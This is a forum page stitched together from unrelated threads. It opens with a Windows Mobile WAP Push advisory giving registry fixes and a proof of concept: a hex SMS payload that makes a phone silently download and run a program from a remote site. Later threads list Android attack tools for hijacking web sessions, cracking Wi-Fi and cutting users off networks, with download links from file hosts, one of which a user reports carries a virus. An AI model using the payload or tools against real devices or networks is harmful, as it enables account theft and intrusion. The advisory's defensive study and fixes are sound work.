Related
Windows Mobile Security Advisory: Manufacturers leave device open for WAP-Push based attacks
--------------------------------------------------------------------------------------------
Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted orginators. This policy is defined in the device registry. If improper settings are applied to this policy attackers can send malicious content to the device which then displays or executes the content immediately. This leaves the device open for further attack scenarios.
Workaround / Fixes:
-------------------
Open your device registry and navigate to:
HKLM\Security\Policies\Policies
Check the values of the following DWORDs:
0x0000100c
and
0x0000100d
Microsofts recommends the following values for these:
0x0000100c : 0x800
0x0000100d : 0xc00
If they are for example 0x840 and 0xc40 your device is wide open and vulnerable. Change the keys to
the Microsoft recommendation. They are effective immediately.
Proof of concept:
-----------------
For testing purposes check the above registry keys and set them to a faulty value (like the above
0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testings.
HushSMS is able to send these kind of messages from windows mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the receipient windows mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS it will then download the above sample
program and executes it immediatly without user interaction.
If you want to test your target device with PDUSpy use the follwing sample message:
UDH: 05040b8423f0
Message(hex):
DC0605B0AF82B48302066A008509037777772e73696c656e7473657276696365732e64652f77617074657374736c2e65786
5000501
Edit: Added a youtube video in post #4
EDIT 19.09.2008: Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Donwload ist at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
tmknight said:
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
Click to expand...
Click to collapse
For SI you are right since the user only gets notified with an URL, but I would call it a huge whole for the SL things. SL messages get executed by the device immediately without the user having a way to block or stop this (if the message is set up accordingly; there are 3 message options as per standard and I refer to the silent execution flag).
If you are watching your device while the messages comes in you can see that a gprs connection is beeing made (if you are connected the whole time with an unlimited data plan for example you wouldnt even notice this).
Just give it try with the method I posted in the advisory with HushSMS (not advertising my program here, just giving a proof of concept).
Both advisories are made by me since I dicovered both flaws.
Cheers
I just made a youtube video to demonstrate what this vulnerability means.
Watch it here: http://de.youtube.com/watch?v=QhJ5SgD-bdQ
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Will you share from where this info came?
Cheers
tmknight said:
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Click to expand...
Click to collapse
Well this is interesting. So you say you had the same faulty registry keys like the new kaiser wm 6.1 rom had? (100c and 100d set to 840 and c40)
As you may have seen in the video my IE simply did not ask to open the file. It just gets executed...
Well, then at least your IE settings saved you from getting r00ted
tmknight said:
Will you share from where this info came?
Click to expand...
Click to collapse
This vulnerability was researched by me about 1 year ago. But the default settings for SL and SI messages was always set correct in the last ROM versions for the devices I had. I just looked at the default settings on this new kaiser rom and found that they left it open for whatever reason and so I published this advisory. I already contacted HTC and am waiting for a response.
hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks
Hello,
Good day, I would like to thank you for this post about Wap Push Messages. I have a straing problem with my HTC Kaiser Windows Mobil 6.1. My device don't notify me about any WAP Push Messages. I have the 800 & c00 vales in my registry, I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new message again but it didn't appear in inbox message and my cell didn't notify me about new WAP PUSH message.
I'm going crazy with this, what's the problem, can you help me ?
Regards,
Desigen said:
... I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new messeage again but it didn't appear in inbox message and my cell didn't notifcate me about new WAP PUSH message.
...
Click to expand...
Click to collapse
I don't understand what exactly your promblem is with. If you set the Microsoft recommended values it simply tell the device which security policy to apply to wich kind of messages. In the case of the two values the settings say that WAP-Push SL & SI messages have to come from trusted push proxy gateways. If you set them to the faulty values (840&c40) the device accepts these kind of messages coming from any. If the correct (or recommended) values are set the device simply drops or discards the messages without any user notification. So your described behaviour looks normal to me.
(Note: for those who are familiar with device roles and policies, I'm not going into deep here to avoid confusion)
Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks
nolovelust said:
hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks
Click to expand...
Click to collapse
Well 0x800 for 0x100c is fine but 0x40 for 0x100d is not.
Policy 4108 (0x100c) handles WAP Push Service Load (SL) Messages
Policy 4109 (0x100d) handles WAP Push Service Indication (SI) Messages
So if policy 4109 (0x100d) is set to 40 this means that the device will accept messages from any instead of trusted push proxy gateways only.
So the settings you wrote above mean the following:
4108 (0x100c) = 0x800 : Accept WAP Push Service Load (SL) messages only from trusted and authenticated push proxy gateways
4109 (0x100d) = 0x40 : Accept WAP Push Service Indication messages from any originator and no authentication is needed
While Service Indication messages are not as harmful as Service Load messages, they still can try to fool people into clicking the download now option. Since the orginator is hidden and you only see network message as the sender, this kind of attack can be used to spoof valid operator messages.
I suggest you set 4109 (0x100d) to a value of 0xc40.
These settings do not prevent your device from receiving these kind of messages, but they have to come from an authenticated and trusted push proxy gateway or source.
Desigen said:
Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks
Click to expand...
Click to collapse
Which kind of wap push message are you talking about?
For those that would like to read more about security policies and roles on windows mobile google for:
"Security Model For Windows Mobile 5.0 and Windows Mobile 6"
c0rnholio said:
Which kind of wap push message are you talking about?
Click to expand...
Click to collapse
Dear c0rnholio,
I think it's SL, I talking about the one you receive an option to download the content for Internet. Because my mobile provider send a WAP-Push to download ringtone over GPRS. So, they told me you need to do some modification in your mobile to receive this kind of messages. My mobile don't save the WAP-Push in the inbox folder. But when I put my SIM in Nokia phone I receive those WAP-Push.
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content.
Thansk
Desigen said:
...
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content...
Click to expand...
Click to collapse
Ah, OK, now I got you. Well, if the policy is set right your device will discard the message you sent with HushSMS because it is not coming from a trusted and authenticated source. But you should still be able to receive these messages from your service provider if your device is properly provisioned.
The fact that you can receive them on your nokia just indicates that nokia also has lazy security settings for these kind of messages.
If you cannot receive your ringtone from your provider when the correct policy settings are applied it seems that your device is not provisioned to trust your service provider. I suggest you enable it temporary by setting the unsecure values and after receiption of your ringtones reset them to the secure values.
Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Download it at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers
Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !
Desigen said:
Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !
Click to expand...
Click to collapse
It seems you misunderstood me, or I'm simply not getting your point here.
Yes, with a value of 0x40 for 0x100d you can receive WAP Push SI messages from anyone. This might become a risk. The secure setting for this policy is 0xc00. This will save you from unwanted SI messages but may block your providers ringtone messages.
The default values you had where set from HTC (or whatever ROM you migth have installed) with the delivery of the ROM that is installed on the device. That's the final point of the advisory. The ROM manufacturer has left the device open for these kind of attacks.
However a final word in our little discussion:
If you want to be able to receive WAP Push messages from an untrusted and unauthenticated source then leave the settings as they were at the beginning. Be warned as this may be a security risk.
If you don't want to receive WAP Push messages from untrusted and unsauthenticated origins, then change the values as described in the first post.
As a rule of thumb: If you want to receive these messages, even if they come from untrusted and unauthenticated sources, but only want this temporary (for example if you know that your provider will send you a ringtone in the next minutes) then set the values to 0x40 each and after you received what you want reset them to the recommended values on the first post.
I'm out...
cheers
Thanks for sharing this usfull information with us.
I don't understand the value '0xc00' -- does that mean just change it to zero's? That's what I did using the registry editor... there were both 'hex' and 'dec' settings, with the 'hex' dword value appearing to be the one that needed fixing -- so I changed 0000100c to 800 and 100d to 0 -- is this right, or have I inadvertently instructed orbiting alien spacecraft to open fire upon earth?
Maybe screenshots, or a little more explanation on exactly what registry changes need to be made, I'm not used to ones with both hex and dec entries...
HTC has uploaded a new Hot fix Today
HTC says on their support site:
"Hot Fix to enhance WAP security for HTC Touch Pro" and follows up with this info:
"When users access the Internet via wireless, some websites may present security concerns. This hot fix enhances the URL filter function in WAP (Wireless Access Protocol) security to prevent access to those web sites which are insecure."
Please - may anyone find out if this hot fix is an important update
This is the Hot Fix
Here is the Hot Fix from HTC.com
looks to me like all it is is a way to block websites that may not work right on your phone or may cause security problems. personally i like the full access and dont want to be limited on which sites i can visit even if they do "think" they are a "security" issue.
Where ist he link on the HTC site about this.. i cant find it anywhere
Here the reg changes :
[HKEY_LOCAL_MACHINE\Security\Policies\Policies]
"0000100c"=dword:800
"0000100d"=dword:C40
Original cab attached.
EDIT: original link here.
monx® said:
Here the reg changes :
[HKEY_LOCAL_MACHINE\Security\Policies\Policies]
"0000100c"=dword:800
"0000100d"=dword:C40
Original cab attached.
EDIT: original link here.
Click to expand...
Click to collapse
Pardon my ignorance but what is this reg edit actually doing?
It's obviously not a simple website blacklist. Does it restrict you from entering data on non-HTTPS websites while on wireless or something?
http://msdn.microsoft.com/en-us/library/ms890523.aspx
Those 2 security policies control that. The dword value is the role mask.
More info: http://msdn.microsoft.com/en-us/library/aa455966.aspx
This page has a list of security roles that fit the role mask at the bottom: http://www.xs4all.nl/~itsme/projects/xda/smartphone-policies.html
100c is set to:
SECROLE_PPG_TRUSTED 2048 Trusted Push Proxy Gateway role.
Messages assigned this role indicate that the content sent by the Push Initiator is trusted by the Push Proxy Gateway. This role implies that the device trusts the Push Proxy Gateway (SECROLE_TRUSTED_PPG).
Click to expand...
Click to collapse
100d is set to:
SECROLE_PPG_TRUSTED 2048 Trusted Push Proxy Gateway role.
SECROLE_PPG_AUTH 1024 Push Initiator Authenticated role.
Messages assigned this role indicate that the Push Initiator is authenticated by the Push Proxy Gateway. This role implies that the device trusts the Push Proxy Gateway (SECROLE_TRUSTED_PPG).
SECROLE_USER_UNAUTH 64 User Unauthenticated role.
This role is assigned to unsigned WAP push messages, and to unsigned .cab files. This role provides permissions to install a Home screen or ring tones.
Click to expand...
Click to collapse
The change from default is allowing SECROLE_USER_UNAUTH in 100d.
I use Mac computers... So i cant install it with an .exe extension.
Are there someone with this file in .cab?
thanx
I have done some reading and observed some Android Wifi tools which could be useful to you guys.
I know some of you guys already know about some of these apps whiles others don't.
My First Wifi Tool is Dsploit.
Introducing dSploit
dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc . This application is still in beta stage, a stable release will be available as soon as possible, but expect some crash or strange behaviour until then, in any case, feel free to submit an issue on GitHub.
Here are some screen shots http://www.dsploit.net/images/shots/1.png
http://www.dsploit.net/images/shots/2.png
And A Walk through Video http://youtu.be/HrQl1cG2Hq0
And you could visit their website http://www.dsploit.net/
My srecond Wifi tool I wanna Show you Guys is Anti-Android Network Toolkit
What is Anti?
ZImperium LTD is proud to annonce Android Network Toolkit - Anti.
Anti consists of 2 parts: The Anti version itself and extendable plugins. Upcoming updates will add functionality, plugins or vulnerabilities/exploits to Anti
Using Anti is very intuitive - on each run, Anti will map your network, scan for active devices and vulnerabilities, and will display the information accordingly: Green led signals an 'Active device', Yellow led signals "Available ports", and Red led signals "Vulnerability found". Also, each device will have an icon representing the type of the device. When finished scanning, Anti will produce an automatic report specifying which vulnerabilities you have or bad practices used, and how to fix each one of them.
This App is Kind of a paid App. But you can get the free version from here http://zantiapp.com/anti.html
Here is a link to the walk through video http://youtu.be/tKW-XV59-gk
My third Wifi Tool is Wifi Kill
Its an application for killing wifi connections, that is preventing users on that network from getting to their websites.
I couldnt find the website for this app. (Seems they dont have any). But you could download it from
Here : http://mediafire.com/?ue5itmf89w5h4x2
Here is a link to the walk through video http://www.youtube.com/watch?v=MtaPF6NcOeo
My third Wifi Tool is Droid Sheep.
Its Actually in Two forms
DroidSheep [Root] is an Android app for Security analysis in wireless networks and capturing facebook, twitter, linkedin and other accounts.
DroidSheep Guard is another Android app for monitoring Androids ARP-table. It tries to detect ARP-Spoofing on the network, such as an attack by DroidSheep, FaceNiff and other software.
For Some reasons, the Doidsheep[Root] cant be downloaded from their website which is this http://droidsheep.de/
But dont worry you can find it here at http://depositfiles.com/files/ektsufdkl
On the other hand, DroidSheep Guard can be found at the playstore
https://play.google.com/store/apps/...h.droidsheep.guard.free&feature=search_result
The next one is Android Netspoof
Description
Network Spoofer lets you change websites on other people’s computers from an Android phone. After downloading simply log onto a Wifi network, choose a spoof to use and press start.
Please note that there is no intention for Network Spoofer to include any malicious features. This application is a fun demonstration of how vulnerable home networks are to simple attacks, with permission of the network owner - DO NOT attempt to use Network Spoofer on any corporate or other non-residential networks (eg. at school, university). It becomes very obvious when Network Spoofer is being used on a Network, and use of Network Spoofer will be considered malicious hacking by network administrators.
It can be downloaded from here http://sourceforge.net/projects/netspoof/files/latest/download
There is another App called AoutoProxy
Description
The most complete proxier on the Market. Autoproxy allows you to use Market, Gmail, maps or surf the web even behind the proxy from your home/school/office.
It works by creating a transparent/intercepting proxier running on your phone that redirects web traffic to your proxy. Other apps don't have to be aware there is a proxy!
All outgoing traffic is captured, formatted and transmitted through your network's proxy. That means it works with market, all browsers, gmail, maps, and others.
This is App is a paid app but they have got the light version.
here is a link to it https://play.google.com/store/apps/details?id=com.mgranja.autoproxy&hl=en
FaceNiff
FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to.
It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK)
It's kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!).
*** ROOTED PHONE *** is required. Please note that if webuser uses SSL this application won't work.
This application due to its nature is very phone-dependant so please let me know if it won't work for You
Use with stock browser (might not work with other)
Legal notice: this application is for educational purposes only. Do not try to use it if it's not legal in your country.
I do not take any responsibility for anything you do using this application. Use at your own risk
It can be downloaded from here http://faceniff.ponury.net/download.php
I will Be updating the list frequently.
UPDATE
So as i said, i would be updating this and guess what i have kept my promise.
There is this App called Intercepter-NG its another android wifi tool i find useful.
Intercepter-NG is a multifunctional network toolkit for various types of IT specialists. It has functionality of
several famous separate tools and more over offers a good and unique alternative of Wireshark for android.
The main features are:
* network discovery with OS detection
* network traffic analysis
* passwords recovery
* files recovery
Runs on Android >=2.3.3 with root+busybox
Looks better on high resolution, but completely comfortable on 480x720.
It can be downloaded from the playstore https://play.google.com/store/apps/...t#?t=W251bGwsMSwxLDEsInN1LnNuaWZmLmNlcHRlciJd
Another important Wifi tool for android is Wifi WOlf
- PCMag.com Editors' Choice award winner for network utilities
If you are a network administrator or a network engineer that has any WiFi / wireless on your network then you already know that you need a good WiFi network monitoring / analyzer tool or toolkit to properly manage and analyze inside your wireless network. Without the proper network tools you have no way to determine proper functionality of your WiFi network or identify security risk that comes with having wireless technology inside of your enterprise corporate LAN. As a network administrator or engineer you already have many other responsibilities with your network such as managing servers, routers, switches, workstations, inventory management, asset management, bandwidth monitoring, troubleshooting... the list is long. Make sure you have a tool that makes your wireless network management easier!
- Active Passive Pre-Deployment and Site Survey and WiFi Analyzer network tools for wireless professionals. Works on 802.11 N, G, B, and A networks (Depends on device)
Quickly perform wifi site surveys by simply double tapping on floor plan to register samples
2.4Ghz and 5Ghz wifi analyzer fully supported in all wireless tools
WiFi Heatmapper
WiFi AP Edge Map
WiFi Channel Map
WiFi Stumbler
WiFi Analyzer
Access point filters allow you to analyze AP edge individually
Wireless security filters identify and analyze secure and non-secure (WEP, Ad-Hoc, Open) wireless networks
Sub-filters allow you to filter out weak WiFi coverage areas
Network Icons for mapping out your hardware
Export all views for email or printing
Export and Import all surveys for backup or to share with other techs using Wolf WiFi Pro
Create multiple sites
Supports and analyze broadcast and hidden SSIDs (once known to device)
Complete help documentation at www.wolfwifi.com and videos on www.youtube.com
-WiFi Scanner and analyzer with summary view and detailed view
-Channel Graph displays and analyze channels in use to easily identify congestion
-Signal Tracker helps you track down access points and adjust antennas
-802.11 A/B/G/N support (depends on device)
It can also be downloaded from the store https://play.google.com/store/apps/...nByaXNpbmdhcHBzLmFuZHJvaWQud29sZndpZmlwcm8iXQ..
And one more thing, The app WifiKIll can also be used to redirect web pages to a specific site.
you can do so by first knowing the sites IP Address, then u open the wifi kill app and go to settings the select rejection method drop policy + redirect to.......
Afterwards click on redirect to IP and insert the Ip of the site you want to redirect to.
Note that None of these Apps are mine and all these apps require root, also i am not the cause of any damages these apps could do to your phone. Thanks
Enjoy:fingers-crossed:
But If you have any questions with these apps or questions on how to install any of them, feel free to ask.
Thanks once more.
DroidSheep link is broken
Turbokat said:
DroidSheep link is broken
Click to expand...
Click to collapse
Its not broken, just choose regular download and wait for the countdown to complete.
Sent from my myTouch 4g using xda app-developers app
here you guys might like this as well.
https://app.box.com/s/1h0mdqynmb5lcz0gasbf
Another tool for site survey
There is another free android tool for heat maps creation - "WiFi Maps Light", available on GOOGLE PLAY, documentation can be found on app's official site.
you gonna want for sure bcmon.apk if you want to get your wifi crack on. crack wep and wpa/wpa2-wps natively in rooted android rom.
http://bcmon.blogspot.com/
https://bcmon.googlecode.com/files/bcmon.apk
https://code.google.com/p/bcmon/
thisworks on a lot of devices i have it working on a samsung galaxy nexus sprint, htc glacier, samsung galaxy s2, nexus 7-2012-grouper, and a couple others. no need for custom rom even just root and youre golden
Commented to follow on this wonderful index
Sent from my E151
Network Toolbox for Android
Another great tool I came across recently is Network Toolbox for Android:
play .google .com/store/apps/details?id=com.appsropos.whois
It includes a bunch of handy admin tools including Whois, RBL checks, DNS and ARIN lookups, Ping, Port Scan, find external IP, Geo Location for Ip addresses, CIDR calculator, Email server tester, and much more! :good:
mark.worth.666 said:
Another great tool I came across recently is Network Toolbox for Android:
play.google .com/store/apps/details?id=com.appsropos.whois
It includes a bunch of handy admin tools including Whois, RBL checks, DNS and ARIN lookups, Ping, Port Scan, find external IP, Geo Location for Ip addresses, CIDR calculator, Email server tester, and much more! :good:
Click to expand...
Click to collapse
asdfghjkl
ktetreault14 said:
asdfghjkl
Click to expand...
Click to collapse
Trying to push it up?
Sent from my HTC Desire HD using XDA Free mobile app
mickeyasamoah said:
Trying to push it up?
Sent from my HTC Desire HD using XDA Free mobile app
Click to expand...
Click to collapse
yes lmao. i haven't found a reliable app for all the wifi tinkering and what not
A bit of help maybe please on Zimperium's anti
I had dsploit installed and stupidly uninstalled it because now I cannot find the last version apk anywhere.
Anyway, I installed Z's ANTI. Everything seemed to go OK. My android is rooted and superuser rights were granted to the app.
My problem is that when it runs a network scan it recognizes my router but no open ports and that seems to be the end of it.
Any advice?
silvanet said:
I had dsploit installed and stupidly uninstalled it because now I cannot find the last version apk anywhere.
Anyway, I installed Z's ANTI. Everything seemed to go OK. My android is rooted and superuser rights were granted to the app.
My problem is that when it runs a network scan it recognizes my router but no open ports and that seems to be the end of it.
Any advice?
Click to expand...
Click to collapse
Me too. I found zanti (dsploit) difficult to use. I would wish to have guides for learning purpose.
Sent from my XT1033 using XDA Free mobile app
I've tried various man in the middle hacks on my laptop with the new zAnti. Its actually very cool
Don't download droid sheep from here (virus)!! I looked at the md5 hash and it did not match the ones of the last 3 versions (the md5 hashes are on http://droidsheep.de/?page_id=23) and also android warned me and blocked the installation
Download the one on https://forum.xdadevelopers.com/showthread.php?t=1539105 from the comment of user "Dlll" i verified the md5 and it matched the version 14 on http://droidsheep.de/?page_id=23 (verify it yourself if you don't trust me)
Stay safe
How to verify?
Graciasz
Muchos gracias ?
I logged into the forum today from my win10 laptop and everytime I open a page in the forum, an executable file called USNC is downloaded. Any other members facing this?
What is this? Is it a bug? A virous? Or should I install it so as to be able to surf the forum better?
Any advise will be appreciated.
Thanx.
Hello.
Even the same thing happens to me. Every time I open a XDA forum page I will see a window where you plan to save a "USNC" file from the web address https://cs.ffbtas.com
This happens either with a Windows 10 PC or MAC.
What is it about? virus? malware?
Happens here also on my phone. Latest Chrome for Android.
I'm getting the same result. @svetius can you look into it?
Same here. It's piss annoying
Same here. I've like 6 downloads!
Yep just logged on and happening to me everytime a page opens on xda... dont think its a virus most likely a bug.. annoying and laggy though
I'm facing the same problem very annoying
Same here. Windows7
It's a broken targeted advert link
They are broken advertising links from a company called Feature Forward. You know those ad videos that play on all sorts of different websites, including this one? Ever wonder how they work? A targeted ad gets sent to your browser. Somehow these are broken, and all you get is an empty file with no extension. But if you check the packet data its an active link to a file traceable to a domain in Washington. Registered under Feature Forward.
http://whois.domaintools.com/ffbtas.com
Don´t know what this have to do with xda ? is there any mod admin or someone else who can declare whats happend ? maybe is a secure problem on xda ?
Whois & Quick Stats
Registrant Org Feature Forward Ltd. is associated with ~1 other domains
Registrar GODADDY.COM, LLC
Registrar Status clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited
Dates Created on 2016-03-03 - Expires on 2018-03-03 - Updated on 2016-03-03
Name Server(s) NS1.P20.DYNECT.NET (has 252,892 domains)
NS2.P20.DYNECT.NET (has 252,892 domains)
NS3.P20.DYNECT.NET (has 252,892 domains)
NS4.P20.DYNECT.NET (has 252,892 domains)
IP Address 184.173.133.205 - 1 other site is hosted on this server
IP Location United States - District Of Columbia - Washington - Ofer Zinger
ASN United States AS36351 SOFTLAYER - SoftLayer Technologies Inc., US (registered Dec 12, 2005)
Domain Status Registered And Active Website
Whois History 17 records have been archived since 2016-03-03
IP History 1 change on 2 unique IP addresses over 1 years
Registrar History 1 registrar
Hosting History 1 change on 2 unique name servers over 1 year
Whois Server whois.godaddy.com
Website
Website Title Feature Forward
Server Type nginx/1.8.0
Response Code 200
SEO Score 73%
Terms 1912 (Unique: 588, Linked: 5)
Images 4 (Alt tags missing: 2)
Links 6 (Internal: 0, Outbound: 1)
Whois Record ( last updated on 2017-05-18 )
Domain Name: ffbtas.com
Registrar URL: http://www.godaddy.com
Registrant Name: Ohad Gliksman
Registrant Organization: Feature Forward Ltd.
Name Server: NS1.P20.DYNECT.NET
Name Server: NS2.P20.DYNECT.NET
Name Server: NS3.P20.DYNECT.NET
Name Server: NS4.P20.DYNECT.NET
DNSSEC: unsigned
You must Register or Log in to view the Whois record for this domain name
madvinegar said:
I logged into the forum today from my win10 laptop and everytime I open a page in the forum, an executable file called USNC is downloaded. Any other members facing this?
What is this? Is it a bug? A virous? Or should I install it so as to be able to surf the forum better?
Any advise will be appreciated.
Thx.
Click to expand...
Click to collapse
Yes I do!
However the XDA site is affected only. But I don't have any idea to get rid of it. Any help is greatly appreciated.
PS:
Just found out on Virus Total that it may be a clean site: https://www.virustotal.com/en/file/...e6c5e0d40ee7ea3296d52373/analysis/1492037740/
It's good to know this doesn't seem like a cause for concern.
Same here
Same for me!
Same here. I was about to start a new thread and find many guys facing same issue.
Its annoying. Any thread / forum i click, this file gets downloaded automatically.
The same thing happens on anandtech and other sites. Hard to say if it was 100% legit to begin with or if it was a drive by download operation that has just been shut down.
i m also facing same issue and this file keep downloading automatically in my android as well as pc both running on same wifi network and i found that a new folder named file is formed in my download path which is not deleting if i try to delete then comes back in next second and its occupiying my storage it is behaving like some sort of virus how to get rid of this
Those using chrome i just installed Adblock & Adblock Plus and its gotten rid of the downloads
+1
getting the annoying USNC file thing too. and confirm it's on anandtech as well. if it's a broken advert, then guessing removing the rogue advert from the site would sort it no?
i also used internet explorer just to check if its chrome problem and it said "Do you want to open or save usnc from cs.ffbtas.com?"
Anybody any idea?
Please read this first!
The entire system is build up for demonstration and should show a new way to protect against Internet and Online threats. It should demonstrate that it is possible within the Internet to protect user, devices and there data.
The entire System is a pure & 100% DNS filter system without the usage of any kind of proxy. My goal is it to proof security is possible without using any kind of proxy.
A lot of sites using HTTPS communications within the Internet and therefore I offer a special self signed Root Certificate which block any existing domain on the blacklist with a valid HTTPS connection. Different sites using broken HTTPS Traffic to detect Adblock technologies and some sites might require the keweon Root Certificate. All HTTPS connections are only used to prevent browser and application errors within your Operation Systems.
From the technical point of few a root certificate and just a DNS server is never a threat for any users or any kind of data. The entire system is protected within various ways to prevent data stealing from users and devices.
For actual reasons and because of many discussions I want to inform you about threat possibilities:
1. DNS Server which are not DNS Server and they act as (transparent) Proxy are able to redirect the entire user traffic for Data Analysis or Data stealing.
2. DNS Server which are not DNS Server and they act as (transparent) Proxy can easily redirect traffic to a Web Server and infect your system with this kind of online threats:
Botnets, Cryptoware, Fake Software, Malware, Miningware, Online Worms, Phishing, Ransomware, Remote Keyloggers, Rogue Security Software, Spyware, Trojans and Virus.
This kind of infections are possible via HTTP (via 80 or any other port) or HTTPS (via 443 or any other port) with or without a valid SSL Certificate. A single Let'sEncrypt can easily support this kind of Online Threats.
3. DNS Server which are not DNS Server and they act as (transparent) Proxy can use all methods of attacks in Point 2 to act as Botnet or Cache Server to spread this kind of attacks by a simple HTTP infection and download additional payload via HTTP (via 80 or any other port) or HTTPS (via 443 or any other port) with a single Let'sEncrypt certificate.
